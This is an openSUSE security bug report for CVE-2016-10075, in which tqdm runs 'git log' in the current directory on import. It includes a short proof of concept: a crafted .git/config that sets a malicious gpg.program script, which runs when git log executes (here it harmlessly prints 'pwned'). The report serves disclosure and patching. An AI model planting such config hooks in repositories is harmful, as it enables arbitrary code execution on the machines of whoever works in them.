Bug ID 1017485
Summary VUL-0: CVE-2016-10075: python-tqdm,python3-tqdm: insecure use of git
Classification openSUSE
Product openSUSE.org
Version unspecified
Hardware Other
URL https://smash.suse.de/issue/178135/
OS Other
Status NEW
Severity Normal
Priority P5 - None
Component 3rd party software
Assignee toddrme2178@gmail.com
Reporter astieger@suse.com
QA Contact opensuse-communityscreening@forge.provo.novell.com
CC arun@gmx.de, jmatejek@suse.com, toddrme2178@gmail.com
Found By Security Response Team
Blocker --- 

When importing tqdm, the tqdm._version module executes the following command:

   git log -n 1 --oneline

This was meant to check if the user is running a pre-release version of tqdm.

But cwd might be a part of an unrelated git repository, possibly a malicious
one. At least with git 2.10 or later, it's possible to craft a repo in which
"git log" executes arbitrary code:


   $ tail -n4 /tmp/.git/config
   [log]
           showSignature = true
   [gpg]
           program = /tmp/moogpg

   $ tail -n4 /tmp/moogpg
   #!/bin/sh
   exec > /dev/tty 2>&1
   cowsay pwned
   sleep 9999

   $ cd /tmp

   $ pydoc tqdm
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||


Upstream bug report:
https://github.com/tqdm/tqdm/issues/328

Affected versions: v4.4.1 and later.



devel:languages:python/python-tqdm 4.8.4
devel:languages:python3/python3-tqdm 4.10.10


References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10075
http://seclists.org/oss-sec/2016/q4/775

You are receiving this mail because: